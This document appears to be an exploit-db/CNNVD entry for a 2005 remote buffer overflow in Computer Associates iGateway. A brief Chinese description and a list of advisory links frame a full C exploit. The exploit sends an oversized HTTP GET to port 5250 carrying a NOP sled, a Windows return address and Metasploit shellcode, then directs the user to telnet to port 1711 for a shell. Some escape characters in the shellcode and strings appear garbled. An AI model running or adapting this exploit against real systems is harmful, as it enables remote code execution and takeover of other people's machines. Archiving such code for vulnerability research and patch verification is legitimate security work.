https://www.exploit-db.com/exploits/1243
https://cxsecurity.com/issue/WLB-2005100042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-074

ComputerAssociates是世界领先的安全厂商，产品包括多种杀毒软件。多个ComputerAssociates产品中存在远程溢出漏洞，起因是没有对用户数据进行正确的边界检查，可能允许攻击者执行任意机器代码。请注意目前还不清楚具体有哪些产品存在漏洞，因此将所有ComputerAssociates产品都列为受影响产品。

/*ca igateway debug remote overflow -egm [email protected]*/
/*01.30.05*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

const int MAXSIZE = 17110;

char sc[] = //metasploit
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x3dx19x6d"
"xf7x83xebxfcxe2xf4xc1x73x86xbaxd5xe0x92x08xc2x79"
"xe6x9bx19x3dxe6xb2x01x92x11xf2x45x18x82x7cx72x01"
"xe6xa8x1dx18x86xbexb6x2dxe6xf6xd3x28xadx6ex91x9d"
"xadx83x3axd8xa7xfax3cxdbx86x03x06x4dx49xdfx48xfc"
"xe6xa8x19x18x86x91xb6x15x26x7cx62x05x6cx1cx3ex35"
"xe6x7ex51x3dx71x96xfex28xb6x93xb6x5ax5dx7cx7dx15"
"xe6x87x21xb4xe6xb7x35x47x05x79x73x17x81xa7xc2xcf"
"x0bxa4x5bx71x5exc5x55x6ex1exc5x62x4dx92x27x55xd2"
"x80x0bx06x49x92x21x62x90x88x91xbcxf4x65xf5x68x73"
"x6fx08xedx71xb4xfexc8xb4x3ax08xebx4ax3exa4x6ex4a"
"x2exa4x7ex4ax92x27x5bx71x6bx58x5bx4axe4x16xa8x71"
"xc9xedx4dxdex3ax08xebx73x7dxa6x68xe6xbdx9fx99xb4"
"x43x1ex6axe6xbbxa4x68xe6xbdx9fxd8x50xebxbex6axe6"
"xbbxa7x69x4dx38x08xedx8ax05x10x44xdfx14xa0xc2xcf"
"x38x08xedx7fx07x93x5bx71x0ex9axb4xfcx07xa7x64x30"
"xa1x7exdax73x29x7exdfx28xadx04x97xe7x2fxdaxc3x5b"
"x41x64xb0x63x55x5cx96xb2x05x85xc3xaax7bx08x48x5d"
"x92x21x66x4ex3fxa6x6cx48x07xf6x6cx48x38xa6xc2xc9"
"x05x5axe4x1cxa3xa4xc2xcfx07x08xc2x2ex92x27xb6x4e"
"x91x74xf9x7dx92x21x6fxe6xbdx9fxcdx93x69xa8x6exe6"
"xbbx08xedx19x6dxf7";

int tcp_connect(char *host,int port) {

struct hostent *hp;
struct sockaddr_in addr;
int sock;

if (!(hp=gethostbyname(host))){
fprintf(stderr,"Something died! n");
return -1;
}

memset(&addr,0,sizeof(addr));
addr.sin_addr=*(struct in_addr*)hp->h_addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
fprintf(stderr,"Dead again!n");
return -1;
}

if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
fprintf(stderr,"Dead once more! n");
return -1;
}
return sock;
}

/*Just supply a target ./caigw-win32 hostname */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE+1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

if(!argv[1])
return 0;

memset(buffer,'x90',MAXSIZE/2);

memcpy(buffer,"GET",3);

for(i=3;i<24;i++)
memcpy(buffer+i," ",1);
for(i=21;i<423;i++)
buffer[i] = 'A';

/* XP SP2*/ 
//memcpy(buffer + 423+25,"xddx10x12x12",4);
/*W2ksp4 */
memcpy(buffer + 422+25,"xddx10x12x12",4);

memcpy(buffer + 460,sc,sclen - 1);
memcpy(buffer + (460 + sclen)," HTTP/1.0rnrnrn",16);
buffer[460+sclen+20] = '';

if( (sock = tcp_connect(argv[1],5250)) != -1 )
{
int bytes = 0;

printf("[~] Sending request... n");
bytes = send(sock,buffer,strlen(buffer),0);
printf("[!] Sent [%d] bytesn",bytes);
}
else 
return -1;

close(sock);
sleep (2);

printf("[@] Now telnet to port 1711n");
return 0;
}

// milw0rm.com [2005-10-10]

来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
来源:XF
名称:brightstor-igateway-http-get-bo(22560)
链接:http://xforce.iss.net/xforce/xfdb/22560
来源:BID
名称:15025
链接:http://www.securityfocus.com/bid/15025
来源:OSVDB
名称:19920
链接:http://www.osvdb.org/19920
来源:SECTRACK
名称:1015045
链接:http://securitytracker.com/id?1015045
来源:SREASON
名称:86
链接:http://securityreason.com/securityalert/86
来源:SECUNIA
名称:17085
链接:http://secunia.com/advisories/17085
来源:FULLDISC
名称:20051019RE:CAID33485-ComputerAssociatesiGatewaydebugmodeHTTPGETrequestbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html
来源:FULLDISC
名称:20051014CAID33485-ComputerAssociatesiGatewaydebugmodeHTTPGETrequestbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html